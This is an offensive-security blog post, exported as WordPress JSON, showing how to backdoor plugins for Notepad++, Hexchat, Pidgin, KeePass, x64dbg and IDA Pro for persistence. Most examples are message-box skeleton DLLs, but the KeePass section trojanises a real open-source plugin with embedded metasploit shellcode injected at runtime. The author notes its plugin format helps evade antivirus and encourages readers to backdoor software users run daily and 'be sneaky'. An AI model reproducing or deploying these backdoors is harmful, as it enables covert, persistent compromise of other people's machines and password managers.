{"id":1527,"date":"2018-03-31T11:31:08","date_gmt":"2018-03-31T11:31:08","guid":{"rendered":"http:\/\/www.gironsec.com\/blog\/?p=1527"},"modified":"2018-03-31T11:31:08","modified_gmt":"2018-03-31T11:31:08","slug":"backdooring-plugins","status":"publish","type":"post","link":"https:\/\/www.gironsec.com\/blog\/2018\/03\/backdooring-plugins\/","title":{"rendered":"Backdooring Plugins"},"content":{"rendered":"

I had this thought speaking with fellow hacker friendos at 2600. Alternative ways to persist. Why not backdoor some popular programs? Sure why not?<\/p>\n

Today let’s scope in on backdooring some plugins for popular software. I will be covering a bunch of other programs, mainly stuff already on my computer. <\/p>\n

First plugin to backdoor will be for Notepad++<\/a>
\nI’ve decided to backdoor ‘mimeTools.dll’ because reasons. I don’t know, it was there and looked nice.
\n\"\"<\/a><\/p>\n

Since I’m hardcore, I will be backdooring this DLL with straight assembly. Sure I could just download a plugin template or something and compile, but where’s the fun in that? If you’re going to add code to an exe, it would be a good idea to have a place to put it. Our shellcode for a backdoor is about 251 bytes.
\n\"\"<\/a>
\nThis means we need a cave of 251 bytes or greater or we need to add a new section to the DLL. I’m going with the latter. You could try and modify the flags on an existing section, but that shit never works. Easier to just add a new section. Recall from previous postings, we add a section via the use of ‘Cff Explorer’. All I’m doing here is adding a new section with and filling it with a file. I used a jpeg or something. After that we rebuild the PE header and save. Oh and don’t forget to set the section flags for ‘executable’ and ‘contains code’ otherwise when we jump it wont run. I chose an appropriate name too.
\n\"\"<\/a><\/p>\n

Opening the dll in IDA reveals our new code section is there and at what address. We’ll need this address when we open the dll in our debugger so that we can perform our long jump and paste \/ save our backdoor shellcode assembly. Again, I’ve covered this before<\/a> I think so if you’re lost, follow that guide.
\n\"\"<\/a><\/p>\n

Now all that’s left to do is drag and drop the modified dll into the plugins folder for notepad++ and run the thing. Low and behold!
\n\"\"<\/a>
\nNotepad++ runs after you click ‘ok’ but imagine that being code to call home or something.
\nIf editing raw dll’s aint your thing, then maybe consider just writing a skeleton dll file and making sure it’s up to code for notepad++?
\n\"\"<\/a>
\nThey aren’t particularly picky, just need to export some entries ‘IsUnicode’,’setInfo’,’getName’,’getFuncsArray’,’beNotified’, and ‘messageProc’. Without those entries, notepad++ just complains and won’t run your code:
\n\"\"<\/a><\/p>\n

Yay, the first one is done. We have more stuff to hack though! What else can I hack? I run Hexchat for my IRC (real hackers use IRC bro). <\/p>\n

First, a cursory look at a sample plugin in hexchat is quite revealing.
\n\"\"<\/a>
\nOnly a few exported entries. Following the documentation reveals that if we just copy those exports, we should be good. Its like I didn’t even need to look.
\n\"\"<\/a><\/p>\n

This time we’re going to just use a skeleton dll file. By mimicking the export entries of another plugin, we can force our code to be run. Here is a simple skeleton dll in C:
\n<\/p>\n

\n
#include <windows.h><\/span>\r\nBOOL APIENTRY DllMain<\/span>(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lol)\r\n{\r\n    switch<\/span> (ul_reason_for_call)\r\n    {\r\n    case<\/span> DLL_PROCESS_ATTACH:\r\n\t\t{\r\n\t\t\tMessageBoxW(NULL<\/span>,L"kek"<\/span>,L"wek"<\/span>,MB_OK);\r\n\t\t\tbreak<\/span>;\r\n\t\t}\r\n\tcase<\/span> DLL_THREAD_ATTACH:\r\n\tcase<\/span> DLL_THREAD_DETACH:\r\n    case<\/span> DLL_PROCESS_DETACH:\r\n        break<\/span>;\r\n    }\r\n    return<\/span> TRUE;\r\n}\r\nextern<\/span> __declspec<\/span>(dllexport) void<\/span> hexchat_plugin_init(void<\/span>)\r\n{\r\n\tMessageBoxW(NULL<\/span>,L"Herro Mr hexchat 1"<\/span>,L"joe"<\/span>,MB_OK);\r\n    return<\/span>;\r\n}\r\nextern<\/span> __declspec<\/span>(dllexport) void<\/span> hexchat_plugin_deinit(void<\/span>)\r\n{\r\n\tMessageBoxW(NULL<\/span>,L"Herro Mr hexchat 2"<\/span>,L"joe"<\/span>,MB_OK);\r\n    return<\/span>;\r\n}\r\nextern<\/span> __declspec<\/span>(dllexport) void<\/span> hexchat_plugin_get_info(void<\/span>)\r\n{\r\n\tMessageBoxW(NULL<\/span>,L"Herro Mr hexchat 3"<\/span>,L"joe"<\/span>,MB_OK);\r\n    return<\/span>;\r\n}\r\n<\/pre>\n<\/div>\n
Why C? because it’s easy as hell to throw our shellcode inside, duhh.
\n\"\"<\/a><\/p>\n
For those who forget, it’s like 3 lines of code to run shellcode in C.
\n<\/p>\n
\n
#include <stdio.h><\/span>\r\n#include <windows.h><\/span>\r\nint<\/span> main<\/span>(void<\/span>)\r\n{\r\n    char<\/span> shellcode[] =<\/span> "<\/span>\\x90\\x90\\x90<\/span>"<\/span>;\r\n    void<\/span> *<\/span>exec =<\/span> VirtualAlloc(0<\/span>, sizeof<\/span> shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n    memcpy(exec, shellcode, sizeof<\/span> shellcode);\r\n    ((void<\/span>(*<\/span>)())exec)();\r\n    return<\/span> 0<\/span>;\r\n}\r\n<\/pre>\n<\/div>\n
Anyways, I compile the thing as a 64 bit dll and drag + drop the thing into my plugins folder (conveniently in the user profile folder, sans protections). It looks as though the contents of dllmain’s DLL_PROCESS_ATTACH area is hit first.
\n\"\"<\/a>
\nNext it launched the plugin init. Please visit me on IRC some time.
\n\"\"<\/a><\/p>\n
Great! Now let’s move on shall we? I use Pidgin instant messenger still. We can totally backdoor that!
\nStep 1: look at exported dll entries:
\n\"\"<\/a>
\nStep 2: Throw entries into skeleton dll. Mind the TLS callbacks. I’ll cover those<\/i> in another blog post maybe. Nifty stuff.
\n<\/p>\n
\n
#include <windows.h><\/span>\r\nBOOL APIENTRY DllMain<\/span>(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lol)\r\n{\r\n    switch<\/span> (ul_reason_for_call)\r\n    {\r\n    case<\/span> DLL_PROCESS_ATTACH:\r\n\t\t{\r\n\t\t\tMessageBoxW(NULL<\/span>,L"kek"<\/span>,L"wek"<\/span>,MB_OK);\r\n\t\t\tbreak<\/span>;\r\n\t\t}\r\n\tcase<\/span> DLL_THREAD_ATTACH:\r\n    case<\/span> DLL_THREAD_DETACH:\r\n    case<\/span> DLL_PROCESS_DETACH:\r\n        break<\/span>;\r\n    }\r\n    return<\/span> TRUE;\r\n}\r\nextern<\/span> __declspec<\/span>(dllexport) int<\/span> purple_init_plugin(char<\/span> *<\/span>filler, int<\/span> filler2)\r\n{\r\n\tMessageBoxW(NULL<\/span>,L"Herro Mr Pidgin"<\/span>,L"joe"<\/span>,MB_OK);\r\n    return<\/span> 1<\/span>;\r\n}\r\n<\/pre>\n<\/div>\n
Step 3: Place in user profile folder and wait for load. Again, the code within DLL_PROCESS_ATTACH is run. The plugin initialization seems to only be a formality.
\n\"\"<\/a>
\nStep 4: ????????????
\nStep 5: Profit!
\n\"\"<\/a><\/p>\n
How about something scary? Let’s backdoor Keepass! It’s slightly different than what I’m presently doing because Keepass is .NET instead of the normal native assembly code I’ve been coding. No matter. C# is ez. Recall I’ve covered this before<\/a>. Since I’m compiling the thing from source, I don’t need to re-invent the wheel. Anywho, I’ve decided to “borrow” someone else’s project. That way i can just add my evil code and compile. This one is called ‘QualityColumn’. Any old plugin would have sufficed.
\n\"\"<\/a><\/p>\n
Now for the code:<\/p>\n
<\/p>\n
\n
\/*<\/span>\r\n  KeePass QualityColumn Plugin<\/span>\r\n  Copyright (C) 2010-2014 Dominik Reichl <dominik.reichl@t-online.de><\/span>\r\n\r\n  This program is free software; you can redistribute it and\/or modify<\/span>\r\n  it under the terms of the GNU General Public License as published by<\/span>\r\n  the Free Software Foundation; either version 2 of the License, or<\/span>\r\n  (at your option) any later version.<\/span>\r\n\r\n  This program is distributed in the hope that it will be useful,<\/span>\r\n  but WITHOUT ANY WARRANTY; without even the implied warranty of<\/span>\r\n  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the<\/span>\r\n  GNU General Public License for more details.<\/span>\r\n\r\n  You should have received a copy of the GNU General Public License<\/span>\r\n  along with this program; if not, write to the Free Software<\/span>\r\n  Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA<\/span>\r\n*\/<\/span>\r\n\r\nusing<\/span> System<\/span>;\r\nusing<\/span> System.Collections.Generic<\/span>;\r\nusing<\/span> System.Text<\/span>;\r\nusing<\/span> System.Windows.Forms<\/span>;\r\nusing<\/span> System.Diagnostics<\/span>;\r\nusing<\/span> System.Runtime.InteropServices<\/span>;\r\nusing<\/span> KeePass.Forms<\/span>;\r\nusing<\/span> KeePass.Plugins<\/span>;\r\nusing<\/span> KeePass.UI<\/span>;\r\nusing<\/span> KeePass.Util.Spr<\/span>;\r\nusing<\/span> KeePassLib<\/span>;\r\nusing<\/span> KeePassLib.Cryptography<\/span>;\r\nusing<\/span> KeePassLib.Utility<\/span>;\r\n\r\nnamespace<\/span> QualityColumn<\/span>\r\n{\r\n\tpublic<\/span> sealed<\/span> class<\/span> QualityColumnExt<\/span> : Plugin\r\n\t{\r\n\t\t[Flags]<\/span>\r\n        public<\/span> enum<\/span> AllocationType\r\n        {\r\n            Commit = 4096<\/span>,\r\n            Reserve = 8192<\/span>,\r\n            Decommit = 16384<\/span>,\r\n            Release = 32768<\/span>,\r\n            Reset = 524288<\/span>,\r\n            Physical = 4194304<\/span>,\r\n            TopDown = 1048576<\/span>,\r\n            WriteWatch = 2097152<\/span>,\r\n            LargePages = 536870912<\/span>\r\n        }\r\n\t\t[Flags]<\/span>\r\n        public<\/span> enum<\/span> AllocationProtect : uint<\/span>\r\n        {\r\n            PAGE_NOACCESS = 1<\/span>u,\r\n            PAGE_READONLY,\r\n            PAGE_READWRITE = 4<\/span>u,\r\n            PAGE_WRITECOPY = 8<\/span>u,\r\n            PAGE_EXECUTE = 16<\/span>u,\r\n            PAGE_EXECUTE_READ = 32<\/span>u,\r\n            PAGE_EXECUTE_READWRITE = 64<\/span>u,\r\n            PAGE_EXECUTE_WRITECOPY = 128<\/span>u,\r\n            PAGE_GUARD = 256<\/span>u,\r\n            PAGE_NOCACHE = 512<\/span>u,\r\n            PAGE_WRITECOMBINE = 1024<\/span>u\r\n        }\r\n\r\n\/*<\/span>\r\n * windows\/x64\/exec - 275 bytes<\/span>\r\n * http:\/\/www.metasploit.com<\/span>\r\n * VERBOSE=false, PrependMigrate=false, EXITFUNC=none,<\/span>\r\n * CMD=cmd.exe<\/span>\r\n *\/<\/span>\r\nbyte<\/span>[] buf = new<\/span> byte<\/span>[275<\/span>] {\r\n0<\/span>xfc,0<\/span>x48,0<\/span>x83,0<\/span>xe4,0<\/span>xf0,0<\/span>xe8,0<\/span>xc0,0<\/span>x00,0<\/span>x00,0<\/span>x00,0<\/span>x41,0<\/span>x51,0<\/span>x41,0<\/span>x50,0<\/span>x52,\r\n0<\/span>x51,0<\/span>x56,0<\/span>x48,0<\/span>x31,0<\/span>xd2,0<\/span>x65,0<\/span>x48,0<\/span>x8b,0<\/span>x52,0<\/span>x60,0<\/span>x48,0<\/span>x8b,0<\/span>x52,0<\/span>x18,0<\/span>x48,\r\n0<\/span>x8b,0<\/span>x52,0<\/span>x20,0<\/span>x48,0<\/span>x8b,0<\/span>x72,0<\/span>x50,0<\/span>x48,0<\/span>x0f,0<\/span>xb7,0<\/span>x4a,0<\/span>x4a,0<\/span>x4d,0<\/span>x31,0<\/span>xc9,\r\n0<\/span>x48,0<\/span>x31,0<\/span>xc0,0<\/span>xac,0<\/span>x3c,0<\/span>x61,0<\/span>x7c,0<\/span>x02,0<\/span>x2c,0<\/span>x20,0<\/span>x41,0<\/span>xc1,0<\/span>xc9,0<\/span>x0d,0<\/span>x41,\r\n0<\/span>x01,0<\/span>xc1,0<\/span>xe2,0<\/span>xed,0<\/span>x52,0<\/span>x41,0<\/span>x51,0<\/span>x48,0<\/span>x8b,0<\/span>x52,0<\/span>x20,0<\/span>x8b,0<\/span>x42,0<\/span>x3c,0<\/span>x48,\r\n0<\/span>x01,0<\/span>xd0,0<\/span>x8b,0<\/span>x80,0<\/span>x88,0<\/span>x00,0<\/span>x00,0<\/span>x00,0<\/span>x48,0<\/span>x85,0<\/span>xc0,0<\/span>x74,0<\/span>x67,0<\/span>x48,0<\/span>x01,\r\n0<\/span>xd0,0<\/span>x50,0<\/span>x8b,0<\/span>x48,0<\/span>x18,0<\/span>x44,0<\/span>x8b,0<\/span>x40,0<\/span>x20,0<\/span>x49,0<\/span>x01,0<\/span>xd0,0<\/span>xe3,0<\/span>x56,0<\/span>x48,\r\n0<\/span>xff,0<\/span>xc9,0<\/span>x41,0<\/span>x8b,0<\/span>x34,0<\/span>x88,0<\/span>x48,0<\/span>x01,0<\/span>xd6,0<\/span>x4d,0<\/span>x31,0<\/span>xc9,0<\/span>x48,0<\/span>x31,0<\/span>xc0,\r\n0<\/span>xac,0<\/span>x41,0<\/span>xc1,0<\/span>xc9,0<\/span>x0d,0<\/span>x41,0<\/span>x01,0<\/span>xc1,0<\/span>x38,0<\/span>xe0,0<\/span>x75,0<\/span>xf1,0<\/span>x4c,0<\/span>x03,0<\/span>x4c,\r\n0<\/span>x24,0<\/span>x08,0<\/span>x45,0<\/span>x39,0<\/span>xd1,0<\/span>x75,0<\/span>xd8,0<\/span>x58,0<\/span>x44,0<\/span>x8b,0<\/span>x40,0<\/span>x24,0<\/span>x49,0<\/span>x01,0<\/span>xd0,\r\n0<\/span>x66,0<\/span>x41,0<\/span>x8b,0<\/span>x0c,0<\/span>x48,0<\/span>x44,0<\/span>x8b,0<\/span>x40,0<\/span>x1c,0<\/span>x49,0<\/span>x01,0<\/span>xd0,0<\/span>x41,0<\/span>x8b,0<\/span>x04,\r\n0<\/span>x88,0<\/span>x48,0<\/span>x01,0<\/span>xd0,0<\/span>x41,0<\/span>x58,0<\/span>x41,0<\/span>x58,0<\/span>x5e,0<\/span>x59,0<\/span>x5a,0<\/span>x41,0<\/span>x58,0<\/span>x41,0<\/span>x59,\r\n0<\/span>x41,0<\/span>x5a,0<\/span>x48,0<\/span>x83,0<\/span>xec,0<\/span>x20,0<\/span>x41,0<\/span>x52,0<\/span>xff,0<\/span>xe0,0<\/span>x58,0<\/span>x41,0<\/span>x59,0<\/span>x5a,0<\/span>x48,\r\n0<\/span>x8b,0<\/span>x12,0<\/span>xe9,0<\/span>x57,0<\/span>xff,0<\/span>xff,0<\/span>xff,0<\/span>x5d,0<\/span>x48,0<\/span>xba,0<\/span>x01,0<\/span>x00,0<\/span>x00,0<\/span>x00,0<\/span>x00,\r\n0<\/span>x00,0<\/span>x00,0<\/span>x00,0<\/span>x48,0<\/span>x8d,0<\/span>x8d,0<\/span>x01,0<\/span>x01,0<\/span>x00,0<\/span>x00,0<\/span>x41,0<\/span>xba,0<\/span>x31,0<\/span>x8b,0<\/span>x6f,\r\n0<\/span>x87,0<\/span>xff,0<\/span>xd5,0<\/span>xbb,0<\/span>xaa,0<\/span>xc5,0<\/span>xe2,0<\/span>x5d,0<\/span>x41,0<\/span>xba,0<\/span>xa6,0<\/span>x95,0<\/span>xbd,0<\/span>x9d,0<\/span>xff,\r\n0<\/span>xd5,0<\/span>x48,0<\/span>x83,0<\/span>xc4,0<\/span>x28,0<\/span>x3c,0<\/span>x06,0<\/span>x7c,0<\/span>x0a,0<\/span>x80,0<\/span>xfb,0<\/span>xe0,0<\/span>x75,0<\/span>x05,0<\/span>xbb,\r\n0<\/span>x47,0<\/span>x13,0<\/span>x72,0<\/span>x6f,0<\/span>x6a,0<\/span>x00,0<\/span>x59,0<\/span>x41,0<\/span>x89,0<\/span>xda,0<\/span>xff,0<\/span>xd5,0<\/span>x63,0<\/span>x6d,0<\/span>x64,\r\n0<\/span>x2e,0<\/span>x65,0<\/span>x78,0<\/span>x65,0<\/span>x00 };\r\n\r\n        [DllImport("Kernel32.dll")]<\/span>\r\n        private<\/span> static<\/span> extern<\/span> IntPtr CreateThread<\/span>(UInt32 lpThreadAttributes, UInt32 dwStackSize, IntPtr lpStartAddress, IntPtr param,\r\n           UInt32 dwCreationFlags, ref<\/span> UInt32 lpThreadId);\r\n\r\n        [DllImport("Kernel32.dll")]<\/span>\r\n        private<\/span> static<\/span> extern<\/span> IntPtr OpenProcess<\/span>(uint<\/span> lol, int<\/span> int_0, int<\/span> int_1);\r\n\r\n        [DllImport("Kernel32.dll", ExactSpelling = true, SetLastError = true)]<\/span>\r\n        private<\/span> static<\/span> extern<\/span> IntPtr VirtualAllocEx<\/span>(IntPtr intptr_0, IntPtr intptr_1, IntPtr intptr_2, AllocationType allocationType_0, AllocationProtect allocationProtect_0);\r\n\r\n        [DllImport("Kernel32.dll", SetLastError = true)]<\/span>\r\n        static<\/span> extern<\/span> bool<\/span> WriteProcessMemory<\/span>(IntPtr hProcess, IntPtr lpBaseAddress,\r\n          byte<\/span>[] lpBuffer, int<\/span> dwSize, ref<\/span> int<\/span> lpNumberOfBytesWritten);\r\n\t\t  \r\n\t\tprivate<\/span> static<\/span> IPluginHost m_host = null<\/span>;\r\n\t\tprivate<\/span> QualityColumnProvider m_prov = null<\/span>;\r\n\r\n\t\tinternal<\/span> static<\/span> IPluginHost Host\r\n\t\t{\r\n\t\t\tget<\/span> { return<\/span> m_host; }\r\n\t\t}\r\n\r\n\t\tpublic<\/span> override<\/span> bool<\/span> Initialize<\/span>(IPluginHost host)\r\n\t\t{\r\n\t\t\tTerminate();\r\n\t\t\tm_host = host;\r\n\t\t\tif<\/span>(m_host == null<\/span>) { Debug.Assert(false<\/span>); return<\/span> false<\/span>; }\r\n\r\n\t\t\tm_prov = new<\/span> QualityColumnProvider();\r\n\t\t\tm_host.ColumnProviderPool.Add(m_prov);\r\n\r\n\t\t\tm_host.MainWindow.FileClosed += this<\/span>.OnFileClosed;\r\n\r\n\t\t\treturn<\/span> true<\/span>;\r\n\t\t}\r\n\r\n\t\tpublic<\/span> override<\/span> void<\/span> Terminate<\/span>()\r\n\t\t{\r\n\t\t\tSystem.Diagnostics.Process olo = System.Diagnostics.Process.GetCurrentProcess();\r\n            int<\/span> pid = olo.Id;\r\n            IntPtr hProcess = OpenProcess(0<\/span>x001F0FFF, 0<\/span>, pid);\r\n            if<\/span> (hProcess == IntPtr.Zero)\r\n            {\r\n                throw<\/span> new<\/span> Exception<\/span>("error!"<\/span>);\r\n            }\r\n            IntPtr intPtr = VirtualAllocEx(hProcess, IntPtr.Zero, (IntPtr)buf.Length,\r\n            AllocationType.Commit | AllocationType.Reserve, AllocationProtect.PAGE_EXECUTE_READWRITE);\r\n            int<\/span> zero = 0<\/span>;\r\n            IntPtr kek = IntPtr.Zero;\r\n            WriteProcessMemory(hProcess, intPtr, buf, buf.Length, ref<\/span> zero);\r\n            UInt32 tid = 0<\/span>;\r\n            CreateThread(0<\/span>, 0<\/span>, intPtr, kek, 0<\/span>, ref<\/span> tid);\r\n\t\t\t\r\n\t\t\tif<\/span>(m_host == null<\/span>) return<\/span>;\r\n\r\n\t\t\tm_host.MainWindow.FileClosed -= this<\/span>.OnFileClosed;\r\n\r\n\t\t\tm_host.ColumnProviderPool.Remove(m_prov);\r\n\t\t\tm_prov = null<\/span>;\r\n\r\n\t\t\tm_host = null<\/span>;\r\n\t\t}\r\n\r\n\t\tprivate<\/span> void<\/span> OnFileClosed<\/span>(object<\/span> sender, FileClosedEventArgs e)\r\n\t\t{\r\n\t\t\tQualityColumnProvider.ClearCache();\r\n\t\t}\r\n\t}\r\n\r\n\tpublic<\/span> sealed<\/span> class<\/span> QualityColumnProvider<\/span> : ColumnProvider\r\n\t{\r\n\t\tprivate<\/span> const<\/span> string<\/span> QcpName = "Password Quality"<\/span>;\r\n\t\tprivate<\/span> const<\/span> string<\/span> QcpBitsSuffix = " bits"<\/span>;\r\n\r\n\t\tprivate<\/span> static<\/span> object<\/span> m_oCacheSync = new<\/span> object<\/span>();\r\n\t\tprivate<\/span> static<\/span> Dictionary<string<\/span>, uint<\/span>> m_dCache =\r\n\t\t\tnew<\/span> Dictionary<string<\/span>, uint<\/span>>();\r\n\r\n\t\tprivate<\/span> string<\/span>[] m_vColNames = new<\/span> string<\/span>[] { QcpName };\r\n\t\tpublic<\/span> override<\/span> string<\/span>[] ColumnNames\r\n\t\t{\r\n\t\t\tget<\/span> { return<\/span> m_vColNames; }\r\n\t\t}\r\n\r\n\t\tpublic<\/span> override<\/span> HorizontalAlignment TextAlign\r\n\t\t{\r\n\t\t\tget<\/span> { return<\/span> HorizontalAlignment.Right; }\r\n\t\t}\r\n\r\n\t\tinternal<\/span> static<\/span> void<\/span> ClearCache<\/span>()\r\n\t\t{\r\n\t\t\tlock<\/span>(m_oCacheSync)\r\n\t\t\t{\r\n\t\t\t\tm_dCache.Clear();\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic<\/span> override<\/span> string<\/span> GetCellData<\/span>(string<\/span> strColumnName, PwEntry pe)\r\n\t\t{\r\n\t\t\tif<\/span>(strColumnName == null<\/span>) { Debug.Assert(false<\/span>); return<\/span> string<\/span>.Empty; }\r\n\t\t\tif<\/span>(strColumnName != QcpName) return<\/span> string<\/span>.Empty;\r\n\t\t\tif<\/span>(pe == null<\/span>) { Debug.Assert(false<\/span>); return<\/span> string<\/span>.Empty; }\r\n\r\n\t\t\tstring<\/span> strPw = pe.Strings.ReadSafe(PwDefs.PasswordField);\r\n\r\n\t\t\tif<\/span>(strPw.IndexOf('{'<\/span>) >= 0<\/span>)\r\n\t\t\t{\r\n\t\t\t\tIPluginHost host = QualityColumnExt.Host;\r\n\t\t\t\tif<\/span>(host == null<\/span>) { Debug.Assert(false<\/span>); return<\/span> string<\/span>.Empty; }\r\n\r\n\t\t\t\tPwDatabase pd = null<\/span>;\r\n\t\t\t\ttry<\/span>\r\n\t\t\t\t{\r\n\t\t\t\t\tpd = host.MainWindow.DocumentManager.SafeFindContainerOf(pe);\r\n\t\t\t\t}\r\n\t\t\t\tcatch<\/span>(Exception) { Debug.Assert(false<\/span>); }\r\n\r\n\t\t\t\tSprContext ctx = new<\/span> SprContext(pe, pd, (SprCompileFlags.Deref |\r\n\t\t\t\t\tSprCompileFlags.TextTransforms), false<\/span>, false<\/span>);\r\n\t\t\t\tstrPw = SprEngine.Compile(strPw, ctx);\r\n\t\t\t}\r\n\r\n\t\t\tuint<\/span> uEst;\r\n\t\t\tlock<\/span>(m_oCacheSync)\r\n\t\t\t{\r\n\t\t\t\tif<\/span>(!m_dCache.TryGetValue(strPw, out<\/span> uEst)) uEst = uint<\/span>.MaxValue;\r\n\t\t\t}\r\n\r\n\t\t\tif<\/span>(uEst == uint<\/span>.MaxValue)\r\n\t\t\t{\r\n\t\t\t\tuEst = QualityEstimation.EstimatePasswordBits(strPw.ToCharArray());\r\n\r\n\t\t\t\tlock<\/span>(m_oCacheSync)\r\n\t\t\t\t{\r\n\t\t\t\t\tm_dCache[strPw] = uEst;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\t\t\treturn<\/span> (uEst.ToString() + QcpBitsSuffix);\r\n\t\t}\r\n\t}\r\n}\r\n<\/pre>\n<\/div>\n
We have options here on how we compile our code. Keepass will take either a class library (.NET dll file), or its own special propriatary format called ‘plgx’. The beauty of this is that we can better hide ourselves from the AV. Thanks Keepass!
\n\"\"<\/a><\/p>\n
For reasons beyond my comprehension, 32 bit shellcode does not work in .NET on my machine. Why? Who fuckin knows?
\n\"\"<\/a>The solution is to use 64 bit shellcode despite the program being 32 bit. Whatever.<\/p>\n
Now, to compile our code, we basically just run KeePass.exe –plgx-create<\/i> at the command line. This opens a dialog box for browsing to the folder containing your C# project files.
\n\"\"<\/a>
\nJust place your plgx file into your keepass folder (doesn’t even have to be the plugins folder lol) and your plugin will run its code along side keepass. Viola!
\n\"\"<\/a>
\n\"\"<\/a><\/p>\n
Noice! We’re really sticking it to the man now! I might as well backdoor my debugger while I’m at it. X64dbg<\/a> is my go-to debugger. If you’re still using olly or immunity, get with the times!<\/p>\n
First we load the thing in CFF Explorer (no ida this time)
\n\"\"<\/a><\/p>\n
3 exports for our skeleton dll program:
\n<\/p>\n
\n
#include <windows.h><\/span>\r\nBOOL APIENTRY DllMain<\/span>(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lol)\r\n{\r\n    switch<\/span> (ul_reason_for_call)\r\n    {\r\n    case<\/span> DLL_PROCESS_ATTACH:\r\n\t\t{\r\n\t\t\tMessageBoxW(NULL<\/span>,L"hello x64dbg, i am a backdoor."<\/span>,L"wek"<\/span>,MB_OK);\r\n\t\t\tbreak<\/span>;\r\n\t\t}\r\n\tcase<\/span> DLL_THREAD_ATTACH:\r\n\tcase<\/span> DLL_THREAD_DETACH:\r\n    case<\/span> DLL_PROCESS_DETACH:\r\n        break<\/span>;\r\n    }\r\n    return<\/span> TRUE;\r\n}\r\nextern<\/span> __declspec<\/span>(dllexport) void<\/span> pluginit(void<\/span>)\r\n{\r\n\tMessageBoxW(NULL<\/span>,L"i am also a backdoor"<\/span>,L"joe"<\/span>,MB_OK);\r\n    return<\/span>;\r\n}\r\nextern<\/span> __declspec<\/span>(dllexport) void<\/span> plugsetup(void<\/span>)\r\n{\r\n\tMessageBoxW(NULL<\/span>,L"i am also a backdoor"<\/span>,L"joe"<\/span>,MB_OK);\r\n    return<\/span>;\r\n}\r\nextern<\/span> __declspec<\/span>(dllexport) void<\/span> plugstop(void<\/span>)\r\n{\r\n\tMessageBoxW(NULL<\/span>,L"i am also a backdoor"<\/span>,L"joe"<\/span>,MB_OK);\r\n    return<\/span>;\r\n}\r\n<\/pre>\n<\/div>\n
For x64dbg to load our plugin, we need only rename our dll file to end in ‘.dp64’ and load it into the plugins folder.
\n\"\"<\/a><\/p>\n
Now we just load our debugger and voila!
\n\"\"<\/a><\/p>\n
Imagine a piece of malware that detects x64dbg is running and then unpacks itself and copies a piece of itself to the plugins folder and then crashes the debugger? Then the next time its run, BAM, owned. So many ideas!
\n\"\"<\/a><\/p>\n
I’ve saved the best for last. Let’s backdoor IDA Pro.<\/p>\n
I’ve chosen the plugin ‘COM Helper’ because it seems to be automatically loaded with IDA.
\n\"\"<\/a>
\nHere we see them in the plugins folder.
\n\"\"<\/a>
\nOpening one of them up in IDA (ironic no?) reveals how there’s only 1 exported entry, ‘PLUGIN’ in all caps. This makes a skeleton program easy.
\n<\/p>\n
\n
#include <windows.h><\/span>\r\nBOOL APIENTRY DllMain<\/span>(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lol)\r\n{\r\n    switch<\/span> (ul_reason_for_call)\r\n    {\r\n    case<\/span> DLL_PROCESS_ATTACH:\r\n\t\t{\r\n\t\t\tMessageBoxW(NULL<\/span>,L"Hi mr IDA"<\/span>,L"YO"<\/span>,MB_OK);\r\n\t\t\tbreak<\/span>;\r\n\t\t}\r\n\tcase<\/span> DLL_THREAD_ATTACH:\r\n\tcase<\/span> DLL_THREAD_DETACH:\r\n    case<\/span> DLL_PROCESS_DETACH:\r\n        break<\/span>;\r\n    }\r\n    return<\/span> TRUE;\r\n}\r\nextern<\/span> __declspec<\/span>(dllexport) void<\/span> PLUGIN(void<\/span>)\r\n{\r\n\tMessageBoxW(NULL<\/span>,L"Hello IDA. I am a backdoor!"<\/span>,L"joe"<\/span>,MB_OK);\r\n    return<\/span>;\r\n}\r\n<\/pre>\n<\/div>\n
We compile our dll, name it ‘comhelper.dll’ and ‘comhelper64.dll’ (want to ensure its run on both versions of IDA), drop in in and viola! Loads via DLL_PROCESS_ATTACH like always.
\n\"\"<\/a>
\nMaybe some evil hacker will now steal my idea and start distributing torrents of IDA with backdoored plugins? Nah, no one would do that!<\/p>\n
VLC, Foobar, DropBox, Ifranview, mumble, Cheat Engine, and so much more can still be backdoored on my machine, but who has time for that shit? If you want to maintain persistence on a machine, try backdooring a plugin on something the user uses daily. Be sneaky.<\/p>\n
In conclusion, we need only add our code to the main dll entry point and our code is run. In fact, it seems that way for most plugins. Sure a few have some prerequisites like certain exported function names and such, but by and large, it seems like you can run code from the ‘DLL_PROCESS_ATTACH’ portion of DllMain. I’ve seen it everywhere lately. Ever used Process Hacker? <\/p>\n
\"\"<\/a>
\nIf I drop any old 64 bit dll into the ‘plugins’ folder of Process Hacker, it seems to run my code without being ‘enabled’ or whatever. Here’s the same 64 bit dll from our IDA pro backdoor thingy:
\n \"\"<\/a><\/p>\n
Failing that, all you have have to do it seems is copy the exported function names (its always names, never ordinals) to meet that of the other plugins. The rest falls into place. I feel like you could automate this process with a virus or something. <\/p>\n
All source and project files are available here<\/a>. Password is infected. <\/p>\n
Thank you for sitting through my blog post. I have much to do still. For example, I have to write a 64 bit variant of my metasploit module, I have to re-write my crypter because its being detected as ‘wannacry’, and I want to dive into the subject of IOT devices and webcams. Oh and that TLS callbacks tidbit. We’ll see what I tackle first.<\/p>\n
Until then, happy hacking!
\n\"\"<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
I had this thought speaking with fellow hacker friendos at 2600. Alternative ways to persist. Why not backdoor some popular programs? Sure why not? Today let’s scope in on backdooring some plugins for popular software. I will be covering a bunch of other programs, mainly stuff already on my computer. First plugin to backdoor will 